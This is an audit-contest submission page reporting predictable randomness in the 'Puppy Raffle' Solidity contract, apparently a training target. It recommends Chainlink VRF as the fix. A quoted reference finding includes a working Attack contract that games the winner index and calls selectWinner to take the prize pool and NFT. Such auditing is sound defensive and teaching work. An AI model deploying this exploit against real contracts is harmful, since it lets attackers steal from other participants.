Puppy Raffle
AI First Flight #1
Beginner FriendlyFoundrySolidityNFT
EXP
View results
Previous Next
Submission Details
Severity: high
Valid

Predictable Randomness Allows Winner Manipulation

firmanregar

Root + Impact

Description

The contract uses on-chain values to generate randomness for winner selection. Since these values are either publicly known or miner-influenced, an attacker can predict or bias the outcome.

The winner index calculation relies entirely on deterministic or manipulable inputs:

uint256 winnerIndex = uint256(keccak256(abi.encodePacked(
msg.sender, // Attacker-controlled
block.timestamp, // Miner-influenced (±15 seconds)
block.difficulty // Miner-influenced
))) % players.length;

Risk

Likelihood:

Undermines protocol integrity, though exploitation requires effort or privileged position.

Impact:

An attacker can influence the raffle outcome in two ways:

  1. Repeated attempts — Try calling selectWinner() from different addresses or at different times until they get a favorable outcome

  2. Miner collusion — A miner can manipulate block.timestamp and block.difficulty to bias results, or simply refuse to include unfavorable transactions.

    This breaks the fairness guarantee that's central to a raffle system.

Proof of Concept

msg.sender is chosen by the caller
block.timestamp can be manipulated by miners within tolerance bounds
block.difficulty is public and predictable

Recommended Mitigation

Use a verifiable random function like Chainlink VRF. This provides cryptographically secure randomness that can't be predicted or manipulated:

// Example integration (simplified)
function selectWinner() external {
require(block.timestamp >= raffleStartTime + raffleDuration, "PuppyRaffle: Raffle not over");
require(players.length >= 4, "PuppyRaffle: Need at least 4 players");
// Request random number from Chainlink VRF
requestRandomness(keyHash, fee);
}
function fulfillRandomness(bytes32 requestId, uint256 randomness) internal override {
uint256 winnerIndex = randomness % players.length;
// ... rest of winner selection logic
}
Updates

Lead Judging Commences

ai-first-flight-judge Lead Judge about 10 hours ago
Submission Judgement Published
Validated
Assigned finding tags:

[H-03] Randomness can be gamed

## Description The randomness to select a winner can be gamed and an attacker can be chosen as winner without random element. ## Vulnerability Details Because all the variables to get a random winner on the contract are blockchain variables and are known, a malicious actor can use a smart contract to game the system and receive all funds and the NFT. ## Impact Critical ## POC ``` // SPDX-License-Identifier: No-License pragma solidity 0.7.6; interface IPuppyRaffle { function enterRaffle(address[] memory newPlayers) external payable; function getPlayersLength() external view returns (uint256); function selectWinner() external; } contract Attack { IPuppyRaffle raffle; constructor(address puppy) { raffle = IPuppyRaffle(puppy); } function attackRandomness() public { uint256 playersLength = raffle.getPlayersLength(); uint256 winnerIndex; uint256 toAdd = playersLength; while (true) { winnerIndex = uint256( keccak256( abi.encodePacked( address(this), block.timestamp, block.difficulty ) ) ) % toAdd; if (winnerIndex == playersLength) break; ++toAdd; } uint256 toLoop = toAdd - playersLength; address[] memory playersToAdd = new address[](toLoop); playersToAdd[0] = address(this); for (uint256 i = 1; i < toLoop; ++i) { playersToAdd[i] = address(i + 100); } uint256 valueToSend = 1e18 * toLoop; raffle.enterRaffle{value: valueToSend}(playersToAdd); raffle.selectWinner(); } receive() external payable {} function onERC721Received( address operator, address from, uint256 tokenId, bytes calldata data ) public returns (bytes4) { return this.onERC721Received.selector; } } ``` ## Recommendations Use Chainlink's VRF to generate a random number to select the winner. Patrick will be proud.

Support

FAQs

Can't find an answer? Chat with us on Discord, Twitter or Linkedin.

Give us feedback!